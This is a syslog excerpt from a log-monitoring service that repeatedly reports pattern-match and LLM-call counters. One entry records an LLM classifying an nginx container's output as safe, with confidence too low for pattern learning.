Mar 20 00:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:47:31.933746 [observer] Pipeline: processed=206 pattern_hits=202 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:47:31.933772 [observer] Patterns: hash=202 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:48:01.942817 [observer] Pipeline: processed=210 pattern_hits=206 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:48:01.942847 [observer] Patterns: hash=206 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:48:31.948569 [observer] Pipeline: processed=212 pattern_hits=208 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:48:31.948599 [observer] Patterns: hash=208 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:49:01.941516 [observer] Pipeline: processed=216 pattern_hits=212 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:49:01.941547 [observer] Patterns: hash=212 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:49:31.933414 [observer] Pipeline: processed=218 pattern_hits=214 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:49:31.933437 [observer] Patterns: hash=214 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:50:01.949915 [observer] Pipeline: processed=222 pattern_hits=218 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:50:01.949944 [observer] Patterns: hash=218 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:50:31.945796 [observer] Pipeline: processed=224 pattern_hits=220 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:50:31.945826 [observer] Patterns: hash=220 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:51:01.935091 [observer] Pipeline: processed=228 pattern_hits=224 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:51:01.935120 [observer] Patterns: hash=224 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:51:31.934598 [observer] Pipeline: processed=230 pattern_hits=226 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:51:31.934628 [observer] Patterns: hash=226 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:52:01.956835 [observer] Pipeline: processed=232 pattern_hits=228 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:52:01.956863 [observer] Patterns: hash=228 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:52:31.934505 [observer] Pipeline: processed=236 pattern_hits=232 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:52:31.934537 [observer] Patterns: hash=232 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:53:01.959936 [observer] Pipeline: processed=240 pattern_hits=236 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:53:01.959971 [observer] Patterns: hash=236 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:53:31.934887 [observer] Pipeline: processed=244 pattern_hits=240 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:53:31.934912 [observer] Patterns: hash=240 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:54:01.950253 [observer] Pipeline: processed=246 pattern_hits=242 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:54:01.950282 [observer] Patterns: hash=242 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:54:31.933592 [observer] Pipeline: processed=250 pattern_hits=246 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:54:31.933616 [observer] Patterns: hash=246 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:55:01.950496 [observer] Pipeline: processed=252 pattern_hits=248 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:55:01.950520 [observer] Patterns: hash=248 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:55:31.944062 [observer] Pipeline: processed=254 pattern_hits=250 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:55:31.944090 [observer] Patterns: hash=250 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:56:01.962246 [observer] Pipeline: processed=258 pattern_hits=254 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:56:01.962269 [observer] Patterns: hash=254 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:56:31.933491 [observer] Pipeline: processed=260 pattern_hits=256 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:56:31.933513 [observer] Patterns: hash=256 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:57:01.939623 [observer] Pipeline: processed=264 pattern_hits=260 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:57:01.939654 [observer] Patterns: hash=260 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:57:31.944491 [observer] Pipeline: processed=266 pattern_hits=262 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:57:31.944515 [observer] Patterns: hash=262 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:58:01.939975 [observer] Pipeline: processed=272 pattern_hits=268 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:58:01.940004 [observer] Patterns: hash=268 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:58:31.942747 [observer] Pipeline: processed=274 pattern_hits=270 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:58:31.942777 [observer] Patterns: hash=270 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:59:01.981806 [observer] Pipeline: processed=276 pattern_hits=272 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:59:01.982751 [observer] Patterns: hash=272 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 00:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:59:31.934388 [observer] Pipeline: processed=280 pattern_hits=276 llm_calls=4 llm_errors=0 learned=0
Mar 20 00:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 00:59:31.934413 [observer] Patterns: hash=276 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:00:01.937053 [observer] Pipeline: processed=282 pattern_hits=278 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:00:01.937080 [observer] Patterns: hash=278 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:00:31.934561 [observer] Pipeline: processed=286 pattern_hits=282 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:00:31.934585 [observer] Patterns: hash=282 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:01:01.950111 [observer] Pipeline: processed=288 pattern_hits=284 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:01:01.950142 [observer] Patterns: hash=284 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:01:31.933909 [observer] Pipeline: processed=292 pattern_hits=288 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:01:31.933932 [observer] Patterns: hash=288 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:02:01.945889 [observer] Pipeline: processed=294 pattern_hits=290 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:02:01.945915 [observer] Patterns: hash=290 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:02:31.950598 [observer] Pipeline: processed=296 pattern_hits=292 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:02:31.950624 [observer] Patterns: hash=292 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:03:01.938483 [observer] Pipeline: processed=300 pattern_hits=296 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:03:01.938510 [observer] Patterns: hash=296 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:03:31.946009 [observer] Pipeline: processed=304 pattern_hits=300 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:03:31.946034 [observer] Patterns: hash=300 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:04:01.962217 [observer] Pipeline: processed=308 pattern_hits=304 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:04:01.962327 [observer] Patterns: hash=304 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:04:31.940615 [observer] Pipeline: processed=310 pattern_hits=306 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:04:31.940639 [observer] Patterns: hash=306 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:05:01.989071 [observer] Pipeline: processed=314 pattern_hits=310 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:05:01.989108 [observer] Patterns: hash=310 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:05:31.941516 [observer] Pipeline: processed=316 pattern_hits=312 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:05:31.941538 [observer] Patterns: hash=312 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:06:01.951816 [observer] Pipeline: processed=318 pattern_hits=314 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:06:01.951841 [observer] Patterns: hash=314 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:06:31.937808 [observer] Pipeline: processed=322 pattern_hits=318 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:06:31.937834 [observer] Patterns: hash=318 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:07:01.950707 [observer] Pipeline: processed=324 pattern_hits=320 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:07:01.950739 [observer] Patterns: hash=320 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:07:31.933464 [observer] Pipeline: processed=328 pattern_hits=324 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:07:31.933495 [observer] Patterns: hash=324 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:08:01.966647 [observer] Pipeline: processed=330 pattern_hits=326 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:08:01.966676 [observer] Patterns: hash=326 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:08:31.934890 [observer] Pipeline: processed=336 pattern_hits=332 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:08:31.934919 [observer] Patterns: hash=332 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:09:01.954759 [observer] Pipeline: processed=338 pattern_hits=334 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:09:01.954794 [observer] Patterns: hash=334 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:09:31.941930 [observer] Pipeline: processed=340 pattern_hits=336 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:09:31.942656 [observer] Patterns: hash=336 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:10:01.992731 [observer] Pipeline: processed=344 pattern_hits=340 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:10:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:10:01.992772 [observer] Patterns: hash=340 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:10:31.934441 [observer] Pipeline: processed=346 pattern_hits=342 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:10:31.934466 [observer] Patterns: hash=342 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:11:01.938016 [observer] Pipeline: processed=350 pattern_hits=346 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:11:01.938042 [observer] Patterns: hash=346 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:11:31.933601 [observer] Pipeline: processed=352 pattern_hits=348 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:11:31.933625 [observer] Patterns: hash=348 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:12:01.961873 [observer] Pipeline: processed=355 pattern_hits=351 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:12:01.961914 [observer] Patterns: hash=351 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:12:31.933560 [observer] Pipeline: processed=358 pattern_hits=354 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:12:31.933583 [observer] Patterns: hash=354 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:13:01.945582 [observer] Pipeline: processed=360 pattern_hits=356 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:13:01.945609 [observer] Patterns: hash=356 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:13:31.933345 [observer] Pipeline: processed=366 pattern_hits=362 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:13:31.933370 [observer] Patterns: hash=362 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:14:01.945674 [observer] Pipeline: processed=368 pattern_hits=364 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:14:01.945703 [observer] Patterns: hash=364 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:14:31.934284 [observer] Pipeline: processed=372 pattern_hits=368 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:14:31.934313 [observer] Patterns: hash=368 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:15:01.941174 [observer] Pipeline: processed=374 pattern_hits=370 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:15:01.941202 [observer] Patterns: hash=370 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:15:31.934451 [observer] Pipeline: processed=377 pattern_hits=373 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:15:31.934477 [observer] Patterns: hash=373 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:16:01.935883 [observer] Pipeline: processed=380 pattern_hits=376 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:16:01.935907 [observer] Patterns: hash=376 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:16:31.951889 [observer] Pipeline: processed=382 pattern_hits=378 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:16:31.951919 [observer] Patterns: hash=378 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:17:01.935107 [observer] Pipeline: processed=386 pattern_hits=382 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:17:01.935131 [observer] Patterns: hash=382 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:17:31.943030 [observer] Pipeline: processed=388 pattern_hits=384 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:17:31.943057 [observer] Patterns: hash=384 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:18:01.941789 [observer] Pipeline: processed=392 pattern_hits=388 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:18:01.941826 [observer] Patterns: hash=388 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:18:31.941387 [observer] Pipeline: processed=396 pattern_hits=392 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:18:31.941410 [observer] Patterns: hash=392 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:19:01.937045 [observer] Pipeline: processed=399 pattern_hits=395 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:19:01.937070 [observer] Patterns: hash=395 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:19:31.941149 [observer] Pipeline: processed=402 pattern_hits=398 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:19:31.941197 [observer] Patterns: hash=398 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:20:01.959530 [observer] Pipeline: processed=404 pattern_hits=400 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:20:01.959554 [observer] Patterns: hash=400 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:20:31.933306 [observer] Pipeline: processed=408 pattern_hits=404 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:20:31.933328 [observer] Patterns: hash=404 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:21:01.946198 [observer] Pipeline: processed=410 pattern_hits=406 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:21:01.946238 [observer] Patterns: hash=406 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:21:31.933402 [observer] Pipeline: processed=414 pattern_hits=410 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:21:31.933430 [observer] Patterns: hash=410 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:22:01.963423 [observer] Pipeline: processed=416 pattern_hits=412 llm_calls=4 llm_errors=0 learned=0
Mar 20 01:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:22:01.963449 [observer] Patterns: hash=412 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=4
Mar 20 01:22:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:22:25.060452 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 01:22:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:22:25.060487 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+)
Mar 20 01:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:22:31.933307 [observer] Pipeline: processed=420 pattern_hits=415 llm_calls=5 llm_errors=0 learned=0
Mar 20 01:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:22:31.933327 [observer] Patterns: hash=415 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5
Mar 20 01:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:23:01.958610 [observer] Pipeline: processed=423 pattern_hits=418 llm_calls=5 llm_errors=0 learned=0
Mar 20 01:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:23:01.958835 [observer] Patterns: hash=418 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5
Mar 20 01:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:23:31.935271 [observer] Pipeline: processed=427 pattern_hits=422 llm_calls=5 llm_errors=0 learned=0
Mar 20 01:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:23:31.935292 [observer] Patterns: hash=422 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5
Mar 20 01:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:24:01.953926 [observer] Pipeline: processed=431 pattern_hits=426 llm_calls=5 llm_errors=0 learned=0
Mar 20 01:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:24:01.953959 [observer] Patterns: hash=426 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5
Mar 20 01:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:24:31.941742 [observer] Pipeline: processed=433 pattern_hits=428 llm_calls=5 llm_errors=0 learned=0
Mar 20 01:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:24:31.941771 [observer] Patterns: hash=428 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5
Mar 20 01:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:25:01.939227 [observer] Pipeline: processed=437 pattern_hits=432 llm_calls=5 llm_errors=0 learned=0
Mar 20 01:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:25:01.939253 [observer] Patterns: hash=432 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5
Mar 20 01:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:25:31.934497 [observer] Pipeline: processed=439 pattern_hits=434 llm_calls=5 llm_errors=0 learned=0
Mar 20 01:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:25:31.934519 [observer] Patterns: hash=434 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5
